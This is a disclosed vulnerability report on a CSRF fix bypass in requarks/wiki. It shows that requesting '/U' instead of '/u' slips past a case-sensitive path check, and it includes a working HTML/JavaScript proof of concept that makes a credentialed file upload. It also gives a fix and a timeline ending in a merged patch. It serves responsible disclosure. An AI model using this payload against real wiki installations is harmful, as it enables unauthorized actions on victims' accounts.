Cross-Site Request Forgery (CSRF) in requarks/wiki

Valid

Reported on

Jan 24th 2022


Note:

Not a vulnerability in ExpressJS

Description

Fix can by bypassed. Express treats routes as case insensitive while req.path is case sensitive. The fix in the previous report was to check if req.path === "/u" https://github.com/Requarks/wiki/blob/a04f7bd650c55d9f6e82f8df93f6fc590db326c7/server/helpers/security.js#L35 and only allow the requests with the Authorization header pass through if that is the case

if (req.path === '/u') {

However, it is possible to bypass this check using /U, which Express will treat it as /u route. As such, it is still possible to make a POST request to the /u endpoint with the Cookie header leaving wikijs vulnerable to CSRF

Proof of Concept

<html>
  <body>
    <script>
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://127.0.0.1:3000/U", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
        xhr.withCredentials = "true";
        var body = "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"mediaUpload\"\r\n" +
          "\r\n" + "{\"folderId\":0}" +
          "\r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"mediaUpload\"; ; filename=\"pwned.txt\"\r\n" + 
          "Content-Type: text/plain\r\n" +
          "\r\n" +
          "[DATA-HERE]" + "\r\n" +
          "-----------------------------256672629917035--\r\n"
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    </script>
  </body>
</html>

Impact

As per previous report

Recommended Fix

Convert req.path to lower case before comparison

We are processing your report and will contact the requarks/wiki team within 24 hours. 4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
We have contacted a member of the requarks/wiki team and are waiting to hear back 4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
haxatron modified the report
4 months ago
haxatron submitted a
4 months ago
haxatron
4 months ago

Researcher


Patch: https://github.com/Haxatron/wiki/commit/8e8ad0339b73ab19066ef10bc1bf9964c9b2c2aa

We have sent a follow up to the requarks/wiki team. We will try again in 7 days. 4 months ago
Nicolas Giard validated this vulnerability 4 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Nicolas Giard confirmed that a fix has been merged on 7b14b3 4 months ago
The fix bounty has been dropped
security.js#L35 has been validated
to join this conversation